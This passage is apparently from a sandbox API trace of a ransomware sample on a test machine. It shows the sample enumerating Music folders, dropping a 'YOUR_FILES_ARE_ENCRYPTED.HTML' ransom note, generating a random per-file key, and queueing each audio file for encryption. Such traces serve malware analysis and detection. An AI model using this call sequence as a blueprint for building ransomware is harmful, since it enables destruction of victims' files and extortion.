(HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.932] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="C1") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="99") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="48") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="37") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="97") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="C9") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="FD") returned 2 [0167.932] 
wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="46") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="CB") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="AE") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="9E") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="F1") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="31") returned 2 [0167.932] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="77") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="6B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="85") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="5A") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="F7") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="3A") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="48") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="19") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="82") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="8B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="7C") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="0B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="F3") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="F1") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="1B") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: 
param_1="D1") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="9C") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="36") returned 2 [0167.933] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="6D") returned 2 [0167.934] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\oYzTnBxoMCh.mp3" [0167.934] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.934] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.958] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x955fe200, ftCreationTime.dwHighDateTime=0x1d7e1b8, ftLastAccessTime.dwLowDateTime=0xd20cf490, ftLastAccessTime.dwHighDateTime=0x1d7e785, ftLastWriteTime.dwLowDateTime=0xd20cf490, ftLastWriteTime.dwHighDateTime=0x1d7e785, nFileSizeHigh=0x0, nFileSizeLow=0xe459, dwReserved0=0x14dd5b4, dwReserved1=0x0, cFileName="oYzTnBxoMCh.mp3", cAlternateFileName="OYZTNB~1.MP3")) returned 0 [0167.958] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0167.958] wnsprintfW (in: pszDest=0x76302f8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0167.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\DXCJlNP3q\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\dxcjlnp3q\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a4 [0167.959] WriteFile (in: hFile=0x5a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0167.961] CloseHandle (hObject=0x5a4) returned 1 [0167.961] GetProcessHeap () returned 0x270000 [0167.962] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76302f8 | out: hHeap=0x270000) returned 1 [0167.964] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15a49390, ftCreationTime.dwHighDateTime=0x1d7dd48, ftLastAccessTime.dwLowDateTime=0x4268f5b0, ftLastAccessTime.dwHighDateTime=0x1d7de6f, ftLastWriteTime.dwLowDateTime=0x4268f5b0, ftLastWriteTime.dwHighDateTime=0x1d7de6f, nFileSizeHigh=0x0, nFileSizeLow=0x15e57, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="enJfnYk gyfr.mp3", cAlternateFileName="ENJFNY~1.MP3")) returned 1 [0167.964] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3") returned 55 [0167.964] lstrcmpW (lpString1="enJfnYk gyfr.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.964] PathFindExtensionW (pszPath="enJfnYk gyfr.mp3") returned=".mp3" [0167.964] lstrlenW (lpString=".mp3") returned 4 [0167.964] PathFindExtensionW (pszPath="enJfnYk gyfr.mp3") returned=".mp3" [0167.964] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\enjfnyk gyfr.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.965] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=89687) returned 1 [0167.965] GetProcessHeap () returned 0x270000 [0167.965] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.965] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="4C") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="6F") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="FE") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F6") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="59") returned 2 [0167.965] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="9A") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="A2") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="11") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="94") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C4") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F3") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="C5") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7F") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="0F") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B7") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="24") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="11") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D9") returned 2 [0167.966] wsprintfW (in: 
param_1=0x4ebda7e, param_2="%02X" | out: param_1="EE") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="0B") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="BF") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="68") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F9") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="05") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="9A") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="0F") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="52") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="0E") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="2B") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="09") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="3C") returned 2 [0167.966] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2F") returned 2 [0167.967] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\enJfnYk gyfr.mp3" [0167.967] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.967] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.970] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0xd2b585a0, ftCreationTime.dwHighDateTime=0x1d7e58d, ftLastAccessTime.dwLowDateTime=0x75e0e890, ftLastAccessTime.dwHighDateTime=0x1d7e5ee, ftLastWriteTime.dwLowDateTime=0x75e0e890, ftLastWriteTime.dwHighDateTime=0x1d7e5ee, nFileSizeHigh=0x0, nFileSizeLow=0x15e8c, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="gh-g.m4a", cAlternateFileName="")) returned 1 [0167.981] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a") returned 47 [0167.982] lstrcmpW (lpString1="gh-g.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.982] PathFindExtensionW (pszPath="gh-g.m4a") returned=".m4a" [0167.982] lstrlenW (lpString=".m4a") returned 4 [0167.982] PathFindExtensionW (pszPath="gh-g.m4a") returned=".m4a" [0167.982] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0167.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\gh-g.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a4 [0167.982] GetFileSizeEx (in: hFile=0x5a4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=89740) returned 1 [0167.983] GetProcessHeap () returned 0x270000 [0167.983] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0167.987] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F5") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="43") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="79") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="A2") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="73") returned 2 
[0167.987] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="19") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F6") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="75") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="9C") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="02") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="34") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="F4") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="7E") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="B9") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="A7") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F9") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3B") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="21") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="4F") returned 2 [0167.987] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="7C") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C0") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="02") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A1") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="43") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="65") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="5D") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: 
param_1="65") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3E") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C0") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="86") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="53") returned 2 [0167.988] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1A") returned 2 [0167.989] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\gh-g.m4a" [0167.989] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.989] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.999] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd6c27, dwReserved1=0x0, cFileName="yg 2", cAlternateFileName="YG2~1")) returned 1 [0167.999] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2") returned 43 [0167.999] GetProcessHeap () returned 0x270000 [0167.999] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0167.999] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2" | out: 
lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2" [0167.999] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\*" [0167.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x867451, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0167.999] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa51505b0, ftCreationTime.dwHighDateTime=0x1d7df13, ftLastAccessTime.dwLowDateTime=0x83f695a0, ftLastAccessTime.dwHighDateTime=0x1d7e5d1, ftLastWriteTime.dwLowDateTime=0x83f695a0, ftLastWriteTime.dwHighDateTime=0x1d7e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x867451, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.000] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2ee26e0, ftCreationTime.dwHighDateTime=0x1d7e1fa, ftLastAccessTime.dwLowDateTime=0x4b63e1a0, ftLastAccessTime.dwHighDateTime=0x1d7e678, ftLastWriteTime.dwLowDateTime=0x4b63e1a0, ftLastWriteTime.dwHighDateTime=0x1d7e678, nFileSizeHigh=0x0, nFileSizeLow=0xc95a, dwReserved0=0x867451, dwReserved1=0x0, cFileName="hXhYUZJtt_lYHHjNoSl.m4a", cAlternateFileName="HXHYUZ~1.M4A")) returned 1 
[0168.000] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a") returned 67 [0168.000] lstrcmpW (lpString1="hXhYUZJtt_lYHHjNoSl.m4a", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.000] PathFindExtensionW (pszPath="hXhYUZJtt_lYHHjNoSl.m4a") returned=".m4a" [0168.000] lstrlenW (lpString=".m4a") returned 4 [0168.001] PathFindExtensionW (pszPath="hXhYUZJtt_lYHHjNoSl.m4a") returned=".m4a" [0168.001] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0168.001] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a" (normalized: "c:\\users\\5alr3u30d3\\music\\qemppb6d\\yg 2\\hxhyuzjtt_lyhhjnosl.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0168.001] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=51546) returned 1 [0168.001] GetProcessHeap () returned 0x270000 [0168.002] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0168.006] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="81") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="61") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0B") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="17") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="E7") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="A0") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="61") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="7F") returned 2 [0168.006] 
wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="C4") returned 2 [0168.006] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="4F") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="2C") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="97") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="F4") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="21") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="C0") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="B5") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="77") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="39") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="6E") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="6E") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="3E") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="82") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="7D") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="40") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="87") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="05") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="4F") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="18") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F9") returned 2 [0168.007] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: 
param_1="A4") returned 2 [0168.008] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="E2") returned 2 [0168.008] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="16") returned 2 [0168.008] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\hXhYUZJtt_lYHHjNoSl.m4a" [0168.008] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.009] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0168.021] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92f91cf0, ftCreationTime.dwHighDateTime=0x1d7dd5f, ftLastAccessTime.dwLowDateTime=0x5f5ddde0, ftLastAccessTime.dwHighDateTime=0x1d7e476, ftLastWriteTime.dwLowDateTime=0x5f5ddde0, ftLastWriteTime.dwHighDateTime=0x1d7e476, nFileSizeHigh=0x0, nFileSizeLow=0x120cb, dwReserved0=0x867451, dwReserved1=0x0, cFileName="jkVcEzcZorxOQEzS.mp3", cAlternateFileName="JKVCEZ~1.MP3")) returned 1 [0168.021] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Music\\qeMPPB6d\\yg 2\\jkVcEzcZorxOQEzS.mp3") returned 64 [0168.021] lstrcmpW (lpString1="jkVcEzcZorxOQEzS.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.021] PathFindExtensionW (pszPath="jkVcEzcZorxOQEzS.mp3") returned=".mp3" [0168.021] lstrlenW (lpString=".mp3") returned 4 [0168.021] PathFindExtensionW (pszPath="jkVcEzcZorxOQEzS.mp3") returned=".mp3" [0168.021] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) 
